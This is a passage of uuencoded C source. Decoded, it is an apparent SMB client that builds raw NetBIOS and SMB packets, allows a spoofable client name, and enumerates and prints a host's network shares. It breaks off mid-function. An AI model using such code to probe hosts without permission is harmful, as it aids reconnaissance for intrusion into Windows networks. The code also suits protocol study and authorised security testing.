+M"B\J5&\@8G5I;&0@82!334(@8F%S92!H96%D97(J+PT*#0IV;VED($)U:6QD
+M4VUB0F%S94AD<B@-"B`@("`@("`@("`@("`@("`@("`@("\J3W5R('!A8VME
+M="HO#0H@("`@("`@("`@("`@("`@("`@("!U7V-H87(@*E!A8VME="P-"B`@
+M("`@("`@("`@("`@("`@("`@("\J5&AE(&-O;6UA;F0@8V]D92HO#0H@("`@
+M("`@("`@("`@("`@("`@("!U7V-H87(@0V]D92D@#0I[#0H@4VUB0F%S94AD
+M<B`J4VUB0F%S93L-"@T*(%-M8D)A<V4@/2`H4VUB0F%S94AD<B`J*2`H4&%C
+M:V5T("L@<VEZ96]F*$YB=%-E<W-I;VY(9'(I*3L-"@T*+RI4:&4@9FEE;&0@
+M(E!R;W1O8V]L(B!C;VYT86EN=',@(E--0B(@86YD('1H92!C:&%R86-T97)S
+M(#!X9F8J+PT*#0H@4VUB0F%S92T^4')O=&]C;VQ;,5T])U,G.PT*(%-M8D)A
+M<V4M/E!R;W1O8V]L6S)=/2=-)SL-"B!3;6)"87-E+3Y0<F]T;V-O;%LS73TG
+M0B<[#0H@4VUB0F%S92T^4')O=&]C;VQ;,%T],'AF9CL-"B`-"B!3;6)"87-E
+M+3Y#;VUM86YD/2!#;V1E.PT*#0H@4VUB0F%S92T^1FQA9W,],'@P.#L-"GT-
+M"@T*+RI4;R!E;F-O9&4@82!.151"24]3(&YA;64J+PT*#0IV;VED($YE=$)I
+M;W-.86UE16YC;V1I;F<H8VAA<B`J3F%M92P@8VAA<B`J3F5T0FEO<TYA;64I
+M#0I[#0H@:6YT(&DL:CTP.PT*(`T*+RI"969O<F4@=&AE(&5N8V]D960@3D54
+M0DE/4R!N86UE+"!T:&5R92!I<R!T:&4@=F%L=64@.B`P>#(P*B\@#0H@#0H@
+M3F5T0FEO<TYA;65;,%T],'@R,#L-"B`-"B!F;W(H:3TQ(#L@:2`\(#,S(#L@
+M:2LK*0T*('L-"B`@3F5T0FEO<TYA;65;:5T@/2`H($YA;65;:ET@/CX@-"`I
+M("L@,'@T,2`[#0H@($YE=$)I;W-.86UE6VDK,5T@/2`H3F%M95MJ72`F(#!X
+M,&8I("L@,'@T,2`[#0H@(&DK*SL-"B`@:BLK.PT*('T-"@T*("\J070@=&AE
+M(&5N9"!O9B!T:&4@96YC;V1E9"!.151"24]3(&YA;64L('1H97)E(&ES('1H
+M92!V86QU93H@,'@P,"HO#0H@#0H@3F5T0FEO<TYA;65;,S-=/3!X,#`[#0H@
+M#0I]#0H-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*+RH@5&AI<R!F
+M=6YC=&EO;B!I<R!U<V5D('1O(')E8V5I=F4@=&AE($YE9U!R;W0@4F5P;'D@
+M#0H@*B!A;F0@=&\@:6YT97)P<F5T(&ET+@T*("H@5V4@=7-E('1H:7,@9G5N
+M8W1I;VX@=&\@:&%V92!T:&4@4TU"(&1O;6%I;DYA;64@*B\@#0H-"F-H87(@
+M*E)E8V5I=F5.96=0<F]T4F5P;'DH#0H@("`@("`@("`@("`@("`@("`@("`@
+M("`@("\J($]U<B!S;V-K970J+PT*("`@("`@("`@("`@("`@("`@("`@("`@
+M("!I;G0@4V]C:RP-"B`@("`@("`@("`@("`@("`@("`@("`@("`@+RI4:&4@
+M9&]M86EN(&YA;64@<W1R:6YG(&QE;F=T:"HO#0H)"0D@(&EN="`J1&]M86EN
+M3F%M94QE;F=T:"D-"GL-"@T*(&EN="!086-K971,96YG=&@[#0H-"B!U7V-H
+M87(@*E!A8VME=#L-"B!U7V-H87(@*D1O;6%I;DYA;64[#0H@=5]I;G0Q-E]T
+M(%-I>F4[#0H@#0H@3F)T4V5S<VEO;DAD<B!.8G1397-S:6]N.PT*#0H@4VUB
+M3F5G4')O=%)E<&QY2&1R("I3;6).96=0<F]T4F5P;'D[#0H-"B\J4F5C96EV
+M92!T:&4@3F5T8FEO<R!(96%D97(@=&\@#0H@*B!K;F]W('1H92!C;W5N="!O
+M9B!D871A<R!B>71E<RHO#0H-"B!R96%D*%-O8VLL)DYB=%-E<W-I;VXL<VEZ
+M96]F*$YB=%-E<W-I;VY(9'(I*3L-"@T*(%!A8VME=$QE;F=T:"`](&YT;VAS
+M*$YB=%-E<W-I;VXN3&5N9W1H*3L@#0H-"B\J5&\@:&%V92!T:&4@4TU"($)A
+M<V4@:&5A9&5R+'1H92!334(@3F5G4')O="!297!L>2!A;F0@9&%T87,J+PT*
+M#0H@4&%C:V5T(#T@*'5?8VAA<B`J*2`H;6%L;&]C*%!A8VME=$QE;F=T:"`J
+M('-I>F5O9BAU7V-H87(I*2D[#0H-"B!R96%D*%-O8VLL4&%C:V5T+%!A8VME
+M=$QE;F=T:"D[#0H-"B!3;6).96=0<F]T4F5P;'D@/2`H4VUB3F5G4')O=%)E
+M<&QY2&1R("HI(`T*("`@("`@("`@("`@("`@("`@("A086-K970@*PT*("`@
+M("`@("`@("`@("`@("`@("!S:7IE;V8H4VUB0F%S94AD<BDI.PT*#0HO*B!4
+M;R!H879E('1H92!S:7IE(&]F('1H92!$;VUA:6X@;F%M92!S=')I;F<J+PT*
+M#0H@;65M8W!Y*"93:7IE+%-M8DYE9U!R;W1297!L>2T^0GET94-O=6YT+'-I
+M>F5O9BAU7VEN=#$V7W0I*3L-"@T*("I$;VUA:6Y.86UE3&5N9W1H(#T@("`@
+M4VEZ92`M(`T*"0D)4VUB3F5G4')O=%)E<&QY+3Y%;F-R>7!T:6]N2V5Y3&5N
+M9W1H.PT*#0H@1&]M86EN3F%M92`]("AU7V-H87(@*BD@*&UA;&QO8R@J1&]M
+M86EN3F%M94QE;F=T:"`J('-I>F5O9BAU7V-H87(I*2D[#0H-"B\J0V]P>2!T
+M:&4@1&]M86EN(&YA;64@:6X@82!S=')I;F<J+PT*#0H@;65M8W!Y*$1O;6%I
+M;DYA;64L#0H@("`@("`@("`@("`@("`@("`@*'5?8VAA<B`J*2`-"B`@("`@
+M("`@("`@("`@("`@("`H4&%C:V5T("L@#0H@("`@("`@("`@("`@("`@("`@
+M('-I>F5O9BA3;6)"87-E2&1R*2`K(`T*("`@("`@("`@("`@("`@("`@("!S
+M:7IE;V8H4VUB3F5G4')O=%)E<&QY2&1R*0T*("`@("`@("`@("`@("`@("`@
+M("`K(%-M8DYE9U!R;W1297!L>2T^16YC<GEP=&EO;DME>4QE;F=T:"DL#0H@
+M("`@("`@("`@("`@("`@("`@("I$;VUA:6Y.86UE3&5N9W1H*3L-"B`-"B!R
+M971U<FX@1&]M86EN3F%M93L-"GT-"@T*+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ+PT*#0HO*E1H:7,@9G5N8W1I;VX@:7,@=7-E9"!T;R!H879E('1H92!4
+M8V]N>"!297!L>2P@#0H@*B!A;F0@=&\@:&%V92!S;VUE(&EN9F]R;6%T:6]N
+M#0H@*B!L:6ME('1H92!4:60@9FEE;&0J+PT*#0H-"G9O:60@4F5C96EV951C
+M;VY84F5P;'DH#0H@("`@("`@("`@("`@("`@("`@("`@("\J3W5R('-O8VME
+M="HO#0H@("`@("`@("`@("`@("`@("`@("`@(&EN="!3;V-K+`T*("`@("`@
+M("`@("`@("`@("`@("`@("`O*E1H92!4240@9FEE;&0J+PT*("`@("`@("`@
+M("`@("`@("`@("`@("!U7VEN=#A?="`J5&ED*0T*>PT*#0H@:6YT(%!A8VME
+M=$QE;F=T:#L-"@T*('5?8VAA<B`J4&%C:V5T.PT*(`T*($YB=%-E<W-I;VY(
+M9'(@3F)T4V5S<VEO;CL-"@T*(%-M8D)A<V5(9'(@*E-M8D)A<V4[#0H-"B`-
+M"B`O*B!4;R!K;F]W('1H92!C;W5N="!O9B!D871A(&)Y=&5S*B\-"@T*(')E
+M860H4V]C:RPF3F)T4V5S<VEO;BQS:7IE;V8H3F)T4V5S<VEO;DAD<BDI.PT*
+M#0H@4&%C:V5T3&5N9W1H(#T@;G1O:',H3F)T4V5S<VEO;BY,96YG=&@I.R`-
+M"@T*+RI792!R96-E:79E('1H92!334(@0F%S92!H96%D97(L(%1C;VYX(')E
+M<&QY(&AE861E<B!A;F0@9&%T87,J+PT*#0H@4&%C:V5T(#T@*'5?8VAA<B`J
+M*2`H;6%L;&]C*%!A8VME=$QE;F=T:"`J('-I>F5O9BAU7V-H87(I*2D[#0H-
+M"B!R96%D*%-O8VLL4&%C:V5T+%!A8VME=$QE;F=T:"D[#0H-"B!3;6)"87-E
+M(#T@*%-M8D)A<V5(9'(@*B`I("A086-K970I.PT*#0HO*E1O(&AA=F4@=&AE
+M(%1I9"!F:65L9"HO#0H-"B!M96UC<'DH5&ED+%-M8D)A<V4M/E1I9"PR*G-I
+M>F5O9BAU7VEN=#A?="DI.PT*#0H@9G)E92A086-K970I.PT*#0I]#0H-"B\J
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\@#0H-"B\J06YA;'ES:7,@;V8@=&AE
+M('1R86YS86-T:6]N(&%N9"!205`@8V]M;6%N9',@<F5P;'DJ+PT*#0HO*D1E
+M9FEN92!T:&4@4TA!4D5?24Y&3R!S=')U8W1U<F4J+PT*('1Y<&5D968@<W1R
+M=6-T#0H@>PT*("!U7V-H87(@3F5T3F%M95LQ,UT[#0H@('5?8VAA<B!0860[
+M#0H@('5?:6YT,39?="!4>7!E.PT*("!U7VEN=#,R7W0@4F5M87)K.PT*('T@
+M4VAA<F5);F9O.PT*#0HO*E-P96-I86P@<W1R=6-T=7)E(&9O<B!T:&4@4D%0
+M(')E<W!O;G-E('!A<F%M971E<G,J+PT*#0H@='EP961E9B!S=')U8W0-"B![
+M#0H@('5?:6YT.%]T(%-T871U<ULR73L-"B`@=5]I;G0X7W0@0V]N=F5R=&5R
+M6S)=.PT*("!U7VEN=#A?="!%;G1R:65S4F5T=7)N961;,ET[#0H@('5?:6YT
+M.%]T($5N=')I97-!=F%I;&%B;&5;,ET[#0H@?2!297!L>5!A<F%M971E<G,[
+M#0H-"G9O:60@4F5C96EV951R86YS4F5P;'DH#0H@("`@("`@("`@("`@("`@
+M("`@("`@("\J3W5R('-O8VME="HO#0H@("`@("`@("`@("`@("`@("`@("`@
+M(&EN="!3;V-K*0T*>PT*(&EN="!086-K971,96YG=&@[#0H-"B!U7V-H87(@
+M*E!A8VME=#L-"@T*+RI%;G1R:65S(&%V86EL86)L92P@;G5M8F5R(&]F(%-(
+M05)%7TE.1D\@<W1R=6-T=7)E<RHO#0H@#0H@=5]I;G0Q-E]T($5N=')I97,[
+M#0H@#0H@3F)T4V5S<VEO;DAD<B!.8G1397-S:6]N.PT*#0H@4VUB5')A;G-2
+M97!L>4AD<B`J4VUB5')A;G-297!L>3L-"@T*('5?:6YT,39?="!$:7-P;&%C
+M96UE;G0[#0H-"B!3:&%R94EN9F\@*E-H87)E.PT*#0H@4F5P;'E087)A;65T
+M97)S("I297!L>3L-"@T*(&EN="!I.PT*(`T*+RI4;R!R96-E:79E('1H92!.
+M971B:6]S(&AE861E<B!A;F0@#0IT;R!K;F]W('1H92!C;W5N="!O9B!D871A
+M(&)Y=&5S*B\-"@T*(')E860H4V]C:RPF3F)T4V5S<VEO;BQS:7IE;V8H3F)T
+M4V5S<VEO;DAD<BDI.PT*#0H@4&%C:V5T3&5N9W1H(#T@;G1O:',H3F)T4V5S
+M<VEO;BY,96YG=&@I.R`-"@T*+RI4;R!R96-E:79E('1H92!3;6(@0F%S92!(
+M96%D97(L(`T*("H@=&AE(%-M8B!4<F%N<V%C=&EO;B!297!L>2P@86YD('1H
+M92`-"B`J(%)!4"!C;VUM86YD(')E<W!O;G-E*B\-"@T*(%!A8VME="`]("AU
+M7V-H87(@*BD@*&UA;&QO8RA086-K971,96YG=&@@*B!S:7IE;V8H=5]C:&%R
+M*2DI.PT*#0H@<F5A9"A3;V-K+%!A8VME="Q086-K971,96YG=&@I.PT*#0HO
+M*E1O(&AA=F4@=&AE(%)!4"!P87)A;65T97)S(&1I<W!L86-E;65N="HO#0H@
+M#0H@4VUB5')A;G-297!L>2`]("A3;6)4<F%N<U)E<&QY2&1R("HI(`T*("`@
+M("`@("`@("`@("`@("`H4&%C:V5T("L-"B`@("`@("`@("`@("`@("`@('-I
+M>F5O9BA3;6)"87-E2&1R*2D[#0H@;65M8W!Y*"9$:7-P;&%C96UE;G0L#0H@
+M("`@("`@(%-M8E1R86YS4F5P;'DM/E!A<F%M971E<D]F9G-E="P-"B`@("`@
+M("`@<VEZ96]F*'5?:6YT,39?="DI.PT*#0H@4F5P;'D@/2`@*%)E<&QY4&%R
+M86UE=&5R<R`J("D@*"!086-K970@*R!$:7-P;&%C96UE;G0I.PT*("`-"B!M
+M96UC<'DH*'5?8VAA<BHI("@F16YT<FEE<RDL#0H@("`@("`@("`H=5]C:&%R
+M("HI("A297!L>2T^16YT<FEE<T%V86EL86)L92DL#0H@("`@("`@("!S:7IE
+M;V8H=5]I;G0Q-E]T*2D[#0H-"B`O*DEN:71I86QI>F4@82!P;VEN=&5R('1O
+M('1H92!S979E<F%L('-H87)E(&EN9F\@<W1R=6-T=7)E<RHO#0H-"B!3:&%R
+M92`]("@@4VAA<F5);F9O("H@*2`H;6%L;&]C*$5N=')I97,@*B!S:7IE;V8H
+M4VAA<F5);F9O*2DI.PT*#0H@;65M8W!Y*%-H87)E+"AU7V-H87(@*BD@*%!A
+M8VME="`@*PT*"0D)("!$:7-P;&%C96UE;G0@*PT*("`@("`@("`@("`@("`@
+M("`@("`@("`@("!S:7IE;V8H4F5P;'E087)A;65T97)S*2DL(`T*("`@("`@
+M("`@("`@("`@("`@("`@("`@("!%;G1R:65S("H@<VEZ96]F*%-H87)E26YF
+M;RDI.PT*#0HO*E!R:6YT('1O('-C<F5E;B!T:&4@<V5V97)A;"!I;F9O<FUA
+M=&EO;BHO#0H-"B!F;W(H:3TP.VD\16YT<FEE<SMI*RLI#0H@>PT*("!P<FEN
+M=&8H(EQN3F%M92`Z("5S(BQ3:&%R95MI72Y.971.86UE*3L-"B`@<W=I=&-H
+M*%-H87)E6VE=+E1Y<&4I#0H@('L-"B`@(&-A<V4@,#H@#0H@("`@<')I;G1F
+M*")<;D1I<VL@9&ER96-T;W)Y('1R964B*3L-"B`@("!B<F5A:SL-"B`@("`-
+M"B`@(&-A<V4@,3H@#0H@("`@<')I;G1F*")<;E!R:6YT97(@<75E=64B*3L-
+M"B`@("!B<F5A:SL-"B`@("`-"B`@(&-A<V4@,CH@#0H@("`@<')I;G1F*")<
+M;D-O;6UU;FEC871I;VYS(&1E=FEC92(I.PT*("`@(&)R96%K.PT*("`@(`T*
+M("`@8V%S92`S.B`-"B`@("!P<FEN=&8H(EQN25!#(BD[#0H@("`@8G)E86L[
+M#0H@('T-"B`@#0H@('!R:6YT9B@B7&Y296UA<FL@.B`E<UQN7&XB+"@H=5]C
+M:&%R("HI(`T*("`@("`@("`@("`@("`@("`@("`@("`@("`H4&%C:V5T("L@
+M1&ES<&QA8V5M96YT("L@#0H)"0D@("!S:7IE;V8H4F5P;'E087)A;65T97)S
+M*2`K#0H)"0D@("!3:&%R95MI72Y296UA<FLI*2D[#0H@("`-"B!]#0I]#0H-
+M"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*+RI4:&ES(&9U;F-T:6]N
+M(&ES('5S960@=&\@:6YJ96-T('1H92!.151"24]3('!A8VME="`@#0H@*B`@
+M=VET:"!T:&4@96YC;V1E9"!.151"24]3(&YA;64@;V8-"B`J('1H92!C;&EE
+M;G0@*'1H870@8V]U;&0@8F4@9F%K92D-"B`J(&%N9"!T:&4@<V5R=F5R)W,@
+M25`@861R97-S*B\-"B`-"G9O:60@4V5N9$YE=$)I;W-.86UE4F5Q=65S="@-
+M"B`@("`@("`@("`@("`@("`@("`@("`@("`@("`O*D]U<B!S;V-K970@*B\-
+M"B`@("`@("`@("`@("`@("`@("`@("`@("`@("!I;G0@4V]C:RP-"B`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`O*E1H92!C;&EE;G0G<R!N86UE*B\-
+M"B`@("`@("`@("`@("`@("`@("`@("`@("`@("!C:&%R("I#;&EE;G0L#0H@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@+RI334(@<V5R=F5R)W,@25`J
+M+PT*("`@("`@("`@("`@("`@("`@("`@("`@("`@(&-H87(@*E--0E-E<G9E
+M<BD-"GL-"B\J5&AE('!A8VME="!T;R!I;FIE8W0J+PT*#0H@=5]C:&%R("I0
+M86-K970[#0H-"B\J5&AE($Y%5$))3U,@:&5A9&5R*B\-"@T*($YB=%-E<W-I
+M;VY(9'(@*DYB=%-E<W-I;VX[#0H@#0HO*E--0B!S97)V97(G<R!.151"24]3
+M(&5N8V]D960@;F%M92HO#0H@#0H@8VAA<B!.0E1397)V97);,S1=.PT*(`T*
+M+RI#;&EE;G0G<R!.151"24]3(&5N8V]D960@;F%M92HO#0H@#0H@8VAA<B!.
+M0E1#;&EE;G1;,S1=.PT*#0HO*D5N8V]D92!T:&4@8VQI96YT)W,@;F%M92HO
+M(`T*(`T*($YE=$)I;W-.86UE16YC;V1I;F<H0VQI96YT+$Y"5$-L:65N="D[
+M#0H-"B\J16YC;V1E('1H92!S97)V97(G<R!N86UE*B\-"B`-"B!.971":6]S
+M3F%M945N8V]D:6YG*%--0E-E<G9E<BQ.0E1397)V97(I.PT*#0HO*D]+(&QE
+M="=S(&)U:6QD('1H92!P86-K970J+PT*#0H@4&%C:V5T(#T@*'5?8VAA<B`J
+M*2`H;6%L;&]C*`T*("`@("`@("`@("`@("`@("`@("`@("`@("`@("!S:7IE
+M;V8H3F)T4V5S<VEO;BD@*PT*("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("!S:7IE;V8H3D)44V5R=F5R*2`K#0H@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`@('-I>F5O9BA.0E1#;&EE;G0I*2D[#0H-"B\J5&AE($Y%5$))3U,@
+M:&5A9&5R*B\-"B`-"B!.8G1397-S:6]N(#T@*$YB=%-E<W-I;VY(9'(@*BD@
+M*%!A8VME="D[#0H-"B\J5'EP97,@/2`P>#@Q(%-E<W-I;VX@<F5Q=65S="HO
+M#0H-"B!.8G1397-S:6]N+3Y4>7!E(#T@,'@X,3L-"@T*+RI&;&%G<R`]($Y/
+M3D4J+PT*(`T*($YB=%-E<W-I;VXM/D9L86=S(#T@,'@P,#L-"@T*+RI,96YG
+M=&@@/2!S:7IE(&]F('1H92!T=V\@3D540DE/4R!E;F-O9&5D(&YA;65S(#T@
+M-C0@8GET97,J+PT*#0H@3F)T4V5S<VEO;BT^3&5N9W1H(#T@;G1O:',H<VEZ
+M96]F*$Y"5%-E<G9E<BD@*R!S:7IE;V8H3D)40VQI96YT*2D[#0H-"B\J0G5I
+M;&0@=&AE('!A8VME="P@>6]U(&UU<W0@<F5S<&5C="!T:&ES(&]R9&5R(#H-
+M"B`J('1H92!.151"24]3('-E<W-I;VX@:&5A9&5R+`T*("H@=&AE('-E<G9E
+M<B=S($Y%5$))3U,@96YC;V1E9"!N86UE("P-"B`J(&9O;&QO=VEN9R!B>2!T
+M:&4@8VQI96YT)W,@3D540DE/4R!E;F-O9&5D(&YA;64L(`T*("H@5&AA="=S
+M(&%L;"!F;VQK<R`J+PT*#0HO*E1H92!E;F-O9&5D($Y%5$))3U,@;F%M92!O
+M9B!T:&4@<V5R=F5R(&ES(&%F=&5R('1H92!.151"24]3(&AE861E<BHO#0H-
+M"B!M96UC<'DH#0H@("`@("`@("\J069T97(@=&AE($Y%5$))3U,@2&5A9&5R
+M*B\-"B`@("`@("`@*'5?8VAA<B`J*2`H4&%C:V5T("L@<VEZ96]F*$YB=%-E
+M<W-I;VY(9'(I*2P-"@DO*E=E('!U="!T:&4@<V5R=F5R)W,@3D540DE/4R!E
+M;F-O9&5D(&YA;64J+PT*("`@("`@("!.0E1397)V97(L#0H@("`@("`@('-I
+M>F5O9BA.0E1397)V97(I*3L-"B`-"B`@#0H@;65M8W!Y*`T*("`@("`@("`O
+M*D%F=&5R('1H92!S97)V97(G<R!.151"24]3(&5N8V]D960@;F%M92HO#0H@
+M("`@("`@("AU7V-H87(@*BD@*%!A8VME="`K(`T*("`@("`@("`@("`@("`@
+M("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<BD@*PT*("`@("`@("`@("`@("`@
+M("`@("!S:7IE;V8H3D)44V5R=F5R*2DL#0H)+RI792!P=70@=&AE(&-L:65N
+M="=S($Y%5$))3U,@96YC;V1E9"!N86UE*B\-"B`@("`@("`@3D)40VQI96YT
+M+`T*("`@("`@("!S:7IE;V8H3D)40VQI96YT*2D[#0H-"B`O*E=R:71E('1H
+M92!P86-K970@=&\@=&AE('=I<F4J+PT*#0H@=W)I=&4H4V]C:RP@4&%C:V5T
+M+"!S:7IE;V8H3F)T4V5S<VEO;DAD<BD@*PT*("`@("`@("`@("`@("`@("`@
+M("`@<VEZ96]F*$Y"5$-L:65N="D@*PT*("`@("`@("`@("`@("`@("`@("`@
+M<VEZ96]F*$Y"5%-E<G9E<BDI.PT*?0T*#0HO*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHO#0H-"B\J(%1H:7,@9G5N8W1I;VX@<V5N9',@82!N96=P<F]T(')E
+M<75E<W0@4&%C:V5T*B\-"@T*=F]I9"!396YD3F5G4')O=%)E<75E<W0H#0H@
+M("`@("`@("`@("`@("`@("`@("`@("`O*D]U<B!S;V-K970J+PT*("`@("`@
+M("`@("`@("`@("`@("`@("`@:6YT(%-O8VLI#0I[#0H@=5]C:&%R("I086-K
+M970[#0H@#0H@:6YT(%!A8VME=$QE;F=T:#L-"@T*(%-M8DYE9U!R;W1297%U
+M97-T2&1R("I.96=297%U97-T.PT*#0H@+RH@5&AE('1O=&%L(&QE;F=T:"!O
+M9B`Z#0H@("H@4VUB($)A<V4@2&5A9&5R("L@4VUB($YE9W!R;W0@4F5Q=65S
+M=`T*("`K($1I86QE8W0@<W1R:6YG("HO#0H-"@T*4&%C:V5T3&5N9W1H(#T)
+M<VEZ96]F*%-M8D)A<V5(9'(I("L@#0H@("`@("`@("`@("`@("`@<VEZ96]F
+M*%-M8DYE9U!R;W1297%U97-T2&1R*2`K#0H@("`@("`@("`@("`@("`@<VEZ
+M96]F*%--0E]04D]43T-/3%,I.PT*#0H@4&%C:V5T(#T@*'5?8VAA<B`J*2`H
+M;6%L;&]C*"A086-K971,96YG=&@@*R`-"B`@("`@("`@("`@("`@("`@("`@
+M("!S:7IE;V8H3F)T4V5S<VEO;DAD<BDI*B`-"B`@("`@("`@("`@("`@("`@
+M("`@("!S:7IE;V8H=5]C:&%R*2DI.R`-"@T*#0HO*B!"=6EL9"!T:&4@3F5T
+M8FEO<R!(96%D97(@*B\-"@T*($)U:6QD3F)T*%!A8VME="Q086-K971,96YG
+M=&@I.PT*#0HO*B!"=6EL9"!T:&4@4TU"($)A<V4@2&5A9&5R("HO#0H-"B!"
+M=6EL9%-M8D)A<V5(9'(H4&%C:V5T+#!X-S(I.PT*#0HO*B!"=6EL9"!T:&4@
+M3F5G<')O="!297%U97-T($AE861E<B`J+PT*#0H@3F5G4F5Q=65S="`]("A3
+M;6).96=0<F]T4F5Q=65S=$AD<B`J*2`-"B`@("`@("`@("`@("`@*%!A8VME
+M="`K('-I>F5O9BA.8G1397-S:6]N2&1R*2`K#0H@("`@("`@("`@("`@("!S
+M:7IE;V8H4VUB0F%S94AD<BDI.PT*(`T*($YE9U)E<75E<W0M/E=O<F1#;W5N
+M="`](#`[#0H-"B\J5&AE('9A;'5E(&]F($)Y=&5#;W5N="!I<R!G:79E;B!L
+M:6ME('1H:7,L#0H@*B!D=64@=&\@=&AE(&YE='=O<FL@8GET92!O<F1E<FEN
+M9PT*("H@;VX@;&EN=7@@86YD('1H92!D969I;FET:6]N(&]F('1H92!H96%D
+M97(@#0H@*B!W:71H(&%R<F%Y<RHO#0H-"B!.96=297%U97-T+3Y">71E0V]U
+M;G1;,%T@/2!S:7IE;V8H4TU"7U!23U1/0T],4RD@*R`Q.PT*#0HO*B@K(#$@
+M9F]R('1H92!S:7IE(&]F($)U9F9E<D9O<FUA="DJ+PT*#0H@3F5G4F5Q=65S
+M="T^0G5F9F5R1F]R;6%T/3!X,#([#0H-"B\J0V]P>2!T:&4@9&EA;&5C="!S
+M=')I;F<J+PT*#0H@;65M8W!Y*"AU7V-H87(@*BD@*%!A8VME="`K('-I>F5O
+M9BA.8G1397-S:6]N2&1R*0T*("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M*R!S:7IE;V8H4VUB0F%S94AD<BD-"B`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("L@<VEZ96]F*%-M8DYE9U!R;W1297%U97-T2&1R*2DL#0H@("`@("`@
+M("`@("`@("`@("`@("`@("`@("!334)?4%)/5$]#3TQ3+`T*("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@<VEZ96]F*%--0E]04D]43T-/3%,I*3L-"@T*
+M+RI4;W1A;"!,96YG=&@@;V8@=&AE('!A8VME="!T;R!B92!S96YD+"`-"B`J
+M('=E(&UU<W0@:6YC;'5D92!T:&4@3F5T0FEO<R!H96%D97(J+PT*#0I086-K
+M971,96YG=&@@/2!S:7IE;V8H3F)T4V5S<VEO;DAD<BD@*PT*("`@("`@("`@
+M("`@("`@<VEZ96]F*%-M8D)A<V5(9'(I("L-"B`@("`@("`@("`@("`@('-I
+M>F5O9BA3;6).96=0<F]T4F5Q=65S=$AD<BD@*PT*("`@("`@("`@("`@("`@
+M<VEZ96]F*%--0E]04D]43T-/3%,I.PT*#0H@=W)I=&4H4V]C:RQ086-K970L
+M4&%C:V5T3&5N9W1H*3L-"GT-"@T*+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M+PT*#0HO*E1H:7,@9G5N8W1I;VX@<V5N9',@82!3971U<%@@<F5Q=65S="!P
+M86-K970J+PT*#0H-"G9O:60@4V5N9%-E='5P6%)E<75E<W0H#0H@("`@("`@
+M("`@("`@("`@("`@("`@("\J3W5R('-O8VME="HO#0H@("`@("`@("`@("`@
+M("`@("`@("`@(&EN="!3;V-K+`T*("`@("`@("`@("`@("`@("`@("`@("`O
+M*G1H92!L96YG=&@@;V8@=&AE(&1O;6%I;B!N86UE('-T<FEN9RHO#0H@("`@
+M("`@("`@("`@("`@("`@("`@(&EN="!$;VUA:6Y.86UE3&5N9W1H+"`-"B`@
+M("`@("`@("`@("`@("`@("`@("`@+RIT:&4@1&]M86EN(&YA;64@<W1R:6YG
+M*B\-"B`@("`@("`@("`@("`@("`@("`@("`@8VAA<B`J1&]M86EN3F%M92D-
+M"GL-"B`-"B!I;G0@4&%C:V5T3&5N9W1H.PT*(`T*('5?8VAA<B`J4&%C:V5T
+M.PT*#0H@4VUB4V5T=7!84F5Q=65S=$AD<B`J4V5T=7!84F5Q=65S=#L-"@T*
+M#0HO*B!4:&4@;&5N9W1H(&]F('1H92!P86-K970@*'=I=&AO=70@3D540DE/
+M4RD@.B`-"B`J(%-M8B!"87-E($AE861E<B`K(%-M8B!3971U<%@@4F5Q=65S
+M=`T*("H@*R!$;VUA:6Y.86UE(&%N9"!.871I=F4@3U,@86YD($YA=&EV92`-
+M"B`J(&-L:65N="!S;W1W87)E('9E<G-I;VX@<W1R:6YG<R`J+PT*#0H-"B!0
+M86-K971,96YG=&@@/2!S:7IE;V8H4VUB0F%S94AD<BD@*PT*("`@("`@("`@
+M("`@("`@('-I>F5O9BA3;6)3971U<%A297%U97-T2&1R*2`K#0H@("`@("`@
+M("`@("`@("`@1&]M86EN3F%M94QE;F=T:"`K(#$@*PT*("`@("`@("`@("`@
+M("`@<VEZ96]F*$Y!5$E615]/4U],04Y-04XI.PT*#0H@4&%C:V5T(#T@*'5?
+M8VAA<B`J*2`H;6%L;&]C*"A086-K971,96YG=&@@*PT*("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(9'(I*2H@#0H@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("!S:7IE;V8H=5]C:&%R*2DI
+M.PT*#0HO*D)U:6QD('1H92!.971B:6]S($AE861E<BHO#0H-"B!"=6EL9$YB
+M="A086-K970L4&%C:V5T3&5N9W1H*3L-"@T*+RI"=6EL9"!T:&4@4TU"($)A
+M<V4@2&5A9&5R*B\-"@T*($)U:6QD4VUB0F%S94AD<BA086-K970L,'@W,RD[
+M#0H-"B\J0G5I;&0@=&AE(%-E='5P6"!R97%U97-T(&AE861E<BHO#0H-"B!3
+M971U<%A297%U97-T(#T@*%-M8E-E='5P6%)E<75E<W1(9'(@*BD@#0H@("`@
